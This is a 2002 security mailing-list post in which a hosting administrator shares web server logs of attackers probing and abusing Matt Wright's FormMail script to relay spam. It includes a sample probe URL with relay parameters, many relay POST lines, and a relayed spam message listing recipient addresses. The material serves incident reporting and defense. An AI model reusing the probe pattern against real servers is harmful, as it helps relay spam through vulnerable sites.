Security Incidents mailing list archives
Re: Matt Wright FormMail Attacks
From: "Mike Lewinski" <mike () rockynet com>
Date: Mon, 14 Jan 2002 10:30:32 -0700
Looks like people are not serious about this probe. Is anybody know why number of formmail.pl attacks is growing? May be it is a part of SPAM toolkit or some very popular tool?
Yes, I've seen (and reported) what appear to be automated probes for vulnerable installations. We had a client install that script on one of our servers and I was fortunate to notice the bounces coming back to us very quickly. I am including two reports I filed, in case the log patterns are of use to anyone. Note that in the first probe below, the attacker's subject line identifies the server that was attempted. Mike ---------------------------------------------------------------------------- ---------------------- 1) Failed probe: GMT offset is -0700. This is a probe for a formmail.pl cgi script that can be used to relay spam. It generated a 404 here. Session Details IP Address 65.34.109.21 Reverse DNS 6534109hfc21.tampabay.rr.com Time Spent 0 min Hits / Kilobytes 1 / 0.61Kb Browser Tag Gozilla/4.0 (compatible; MSIE 5.5; windows 2000) Referring URL Date and Time URL 2002-01-07 19:20:24 /cgi-bin/formmail.pl?email=f2%40aol%2ecom&subject=www%2ecoloradowild%2eorg%2 fcgi%2dbin%2fformmail%2epl&recipient=bxw%40aol%2ecom&msg=w00t ---------------------------------------------------------------------------- ---------------------- 2) Successful relays: The log times below are set to UTC, and were recorded on Jan 01, 2001. Also attached is a sample of the bounced spam that was relayed through this client's script (now disabled). 00:52:59 63.199.200.93 POST /cgi-bin/formmail.pl - 502 564 343 80 Microsoft+URL+Control+-+6.00.8862 - 00:52:59 63.199.200.93 POST /cgi-bin/formmail.cgi - 200 10590 345 80 Microsoft+URL+Control+-+6.00.8862 - 13:17:51 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 9515 1737 80 Microsoft+URL+Control+-+6.00.8862 - 21:07:30 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11401 1182 80 Microsoft+URL+Control+-+6.00.8862 - 21:15:23 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11562 1495 80 Microsoft+URL+Control+-+6.00.8862 - 21:16:27 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 9515 1329 80 Microsoft+URL+Control+-+6.00.8862 - 21:26:07 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11780 1554 80 Microsoft+URL+Control+-+6.00.8862 - 21:28:54 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11462 1241 80 Microsoft+URL+Control+-+6.00.8862 - 21:35:09 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11615 1391 80 Microsoft+URL+Control+-+6.00.8862 - 21:40:39 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11323 1108 80 Microsoft+URL+Control+-+6.00.8862 - 21:42:33 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11549 1331 80 Microsoft+URL+Control+-+6.00.8862 - 21:42:58 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11535 1316 80 Microsoft+URL+Control+-+6.00.8862 - 21:43:26 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11674 1459 80 Microsoft+URL+Control+-+6.00.8862 - 21:43:56 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11930 1705 80 Microsoft+URL+Control+-+6.00.8862 - 21:44:07 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11344 1121 80 Microsoft+URL+Control+-+6.00.8862 - 21:45:14 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11817 1589 80 Microsoft+URL+Control+-+6.00.8862 - 21:49:47 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 8597 1477 80 Microsoft+URL+Control+-+6.00.8862 - 21:55:43 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11695 1250 80 Microsoft+URL+Control+-+6.00.8862 - 22:06:03 66.125.153.7 POST /cgi-bin/formmail.cgi - 502 565 1364 80 Microsoft+URL+Control+-+6.00.8862 - 22:07:13 66.125.153.7 POST /cgi-bin/formmail.cgi - 502 565 1601 80 Microsoft+URL+Control+-+6.00.8862 - 22:07:13 66.125.153.7 POST /cgi-bin/formmail.cgi - 502 565 1336 80 Microsoft+URL+Control+-+6.00.8862 - 22:09:38 66.125.153.7 POST /cgi-bin/formmail.cgi - 502 345 1308 80 Microsoft+URL+Control+-+6.00.8862 - 22:11:06 66.125.153.7 POST /cgi-bin/formmail.cgi - 502 345 1533 80 Microsoft+URL+Control+-+6.00.8862 - 22:18:28 66.125.153.7 POST /cgi-bin/formmail.cgi - 502 345 1580 80 Microsoft+URL+Control+-+6.00.8862 - 22:18:34 66.125.153.7 POST /cgi-bin/formmail.cgi - 502 345 1236 80 Microsoft+URL+Control+-+6.00.8862 - Note that this spam sample matches from the line above by timestamp. It does not otherwise show the originating IP in the headers (a flaw in Blat IMHO): 21:07:30 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11401 1182 80 Microsoft+URL+Control+-+6.00.8862 - Received: from rockynet.com (smtp.rockynet.com [206.168.216.11]) by rly-xc01.mx.aol.com (v83.18) with ESMTP id MAILRELAYINXC17-0101160728; Tue, 01 Jan 2002 16:07:28 -0500 Received: from web3 [206.168.216.8] by rockynet.com (SMTPD32-7.04) id A5112EDA00F2; Tue, 01 Jan 2002 14:07:29 -0700 Date: Tue, 01 Jan 2002 14:07:29 -0700 From: arkansas () candycanelane com Sender: webmaster () rockynet com Reply-to: webmaster () rockynet com Subject: Need Extra Money? O794A2kx7cob4zQ To: diana63814 () aol com, laver76 () aol com, pologuy21 () aol com, diana63828 () aol com, shanlynn () aol com, diana639 () aol com, laver7 () aol com, budmld () aol com, shanlynne () aol com, budmlh58 () aol com, alisha4972 () aol com, geoander () aol com, budmmann2 () aol com, shanlynng () aol com, tomdawgo7 () aol com, mlewis9106 () aol com, jens235 () aol com, jens239 () aol com, budmn151 () aol com X-Mailer: WinNT's Blat ver 1.8.2b http://www.interlog.com/~tcharron Message-Id: <200201011407277.SM00203@web3> This is an online application from (arkansas () candycanelane com) on Tuesday, January 1, 2002 at 14:07:29 ------------------------------------------------------- : <br><HTML><FONT BACK="#ffffff" style="BACKGROUND-COLOR: #ffffff" SIZE=2 PTSIZE=10><BR><BR>EARN MONEY WORKING AT HOME<BR>WORK THE HOURS YOU WANT<BR><A HREF="aol:/2000:http://www.ckoejzldwoji.com () tiffany6811 tripod com/#jcispqeq vxunb">CLICK HERE</A> FOR DETAILS<BR><BR></FONT></HTML><br><p><br><p><br><p><br><p><br><p><br><p>28D0c k0SFAK7tb6jNInX7sPazoxX30PrqyoY06k9hp8dSUb5954vAVs95214lW6L28D0ck0SFAK7tb6jN InX7sPazoxX30PrqyoY06k9hp8ddx7mJEj2544dJLaA21M1tM3B8QT7ls9CVQUFcjYrWYoG43YiE wfO09 ------------------------------------------------------- ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- RE: Matt Wright FormMail Attacks Pence, Derek A. (Jan 14)
- Re: Matt Wright FormMail Attacks Brannon (Jan 14)
- Re: Matt Wright FormMail Attacks Markus Stumpf (Jan 15)
- <Possible follow-ups>
- RE: Matt Wright FormMail Attacks Turner, Keith (Jan 14)
- RE: Matt Wright FormMail Attacks Christopher X. Candreva (Jan 14)
- RE: Matt Wright FormMail Attacks Jose Nazario (Jan 14)
- Matt Wright FormMail Attacks Dmitri Smirnov (Jan 14)
- Re: Matt Wright FormMail Attacks Mike Lewinski (Jan 14)
- Re: Matt Wright FormMail Attacks Jose Nazario (Jan 14)
- Re: Matt Wright FormMail Attacks jlewis (Jan 14)
- Re: Matt Wright FormMail Attacks Mike Lewinski (Jan 14)
- Re: Matt Wright FormMail Attacks Michael Hottinger (Jan 15)